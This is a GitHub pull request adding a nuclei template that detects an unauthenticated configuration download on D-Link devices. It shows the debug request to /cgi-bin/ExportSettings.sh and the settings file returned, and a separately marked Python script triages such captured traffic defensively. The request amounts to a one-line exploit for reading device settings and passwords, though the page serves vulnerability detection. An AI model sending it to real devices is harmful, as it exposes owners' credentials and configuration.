Create d-link-auth-bypass.yaml #7645

Merged: 5 commits, Jul 10, 2023

gy741 (Contributor) commented Jul 8, 2023

Template / PR Information

Hello,

Added d-link-auth-bypass.yaml

Template Validation

I've validated this template locally?

  • YES
  • NO

I tested using firmware emulation, so the results may be unstable.
I think that, depending on the setup, you may not see the "Password" value.
"Password" exists in the reference video.

$ nuclei -t ./test.yaml -u http://192.168.0.1/ --debug

GET /cgi-bin/ExportSettings.sh HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [d-link-auth-bypass] Dumped HTTP response http://192.168.0.1/cgi-bin/ExportSettings.sh

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache\n
Content-Disposition: attachment; filename="RT2880_Settings.dat"
Content-Transfer-Encoding: binary
Content-Type: application/octet-stream
Pragma: no-cache\n


00000000  23 54 68 65 20 66 6f 6c  6c 6f 77 69 6e 67 20 6c  |#The following l|
00000010  69 6e 65 20 6d 75 73 74  20 6e 6f 74 20 62 65 20  |ine must not be |
00000020  72 65 6d 6f 76 65 64 2e  0a 44 65 66 61 75 6c 74  |removed..Default|
00000030  0a                                                |.|
[d-link-auth-bypass:status-2] [http] [critical] http://192.168.0.1/cgi-bin/ExportSettings.sh
[d-link-auth-bypass:regex-1] [http] [critical] http://192.168.0.1/cgi-bin/ExportSettings.sh
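
A defender-side triage of the exchange shown in the comment above, added here as an example and not part of this PR or the merged template: it classifies a captured request/response pair as an unauthenticated settings export. The function names, the rule that a request without an `Authorization` or `Cookie` header carried no credentials, and the sample messages are assumptions constructed for illustration.

```python
import re

MARKER = b"#The following line must not be removed."  # first line of the dumped body

def parse_message(raw: bytes):
    """Split a raw HTTP message into (start_line, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body

def classify(request: bytes, response: bytes) -> dict:
    """Triage one captured exchange for an unauthenticated settings export."""
    _, req_h, _ = parse_message(request)
    status_line, resp_h, body = parse_message(response)
    m = re.match(r"HTTP/\d\.\d (\d{3})", status_line)
    status = int(m.group(1)) if m else None
    # Assumption: no Authorization or Cookie header means no credentials were sent.
    sent_creds = "authorization" in req_h or "cookie" in req_h
    is_export = (
        status == 200
        and resp_h.get("content-disposition", "").lower().startswith("attachment")
        and body.lstrip().startswith(MARKER)
    )
    return {
        "status": status,
        "unauthenticated_export": is_export and not sent_creds,
        # Report presence only; never log the value itself.
        "password_field_present": is_export and b"Password" in body,
    }

# Constructed samples modeled on the exchange above (not captured traffic).
REQUEST = b"GET /cgi-bin/ExportSettings.sh HTTP/1.1\r\nHost: 192.168.0.1\r\nAccept: */*\r\n\r\n"
EXPORT = (
    b"HTTP/1.0 200 OK\r\nConnection: close\r\nCache-Control: no-cache\\n\r\n"
    b'Content-Disposition: attachment; filename="RT2880_Settings.dat"\r\n'
    b"Content-Type: application/octet-stream\r\n\r\n"
    b"#The following line must not be removed.\nDefault\n"
)
DENIED = b"HTTP/1.0 401 Unauthorized\r\nWWW-Authenticate: Basic realm=\"router\"\r\n\r\n"

if __name__ == "__main__":
    print(classify(REQUEST, EXPORT))
    print(classify(REQUEST, DENIED))
```

After a firmware fix or access-control change, the same pair of messages should classify like `DENIED`.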

actions-user and others added 2 commits July 8, 2023 01:28
Security vulnerability known as Unauthenticated access to settings or Unauthenticated configuration download. This vulnerability occurs when a device, such as a repeater, allows the download of user settings without requiring proper authentication.

Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com>
@DhiyaneshGeek DhiyaneshGeek self-assigned this Jul 8, 2023
@DhiyaneshGeek DhiyaneshGeek added the Done Ready to merge label Jul 8, 2023
@ritikchaddha ritikchaddha merged commit 6989cfa into projectdiscovery:main Jul 10, 2023
2 checks passed
ritikchaddha (Contributor) commented Jul 10, 2023

Hello @gy741, thank you so much for sharing this template with the community and contributing to this project 🍻
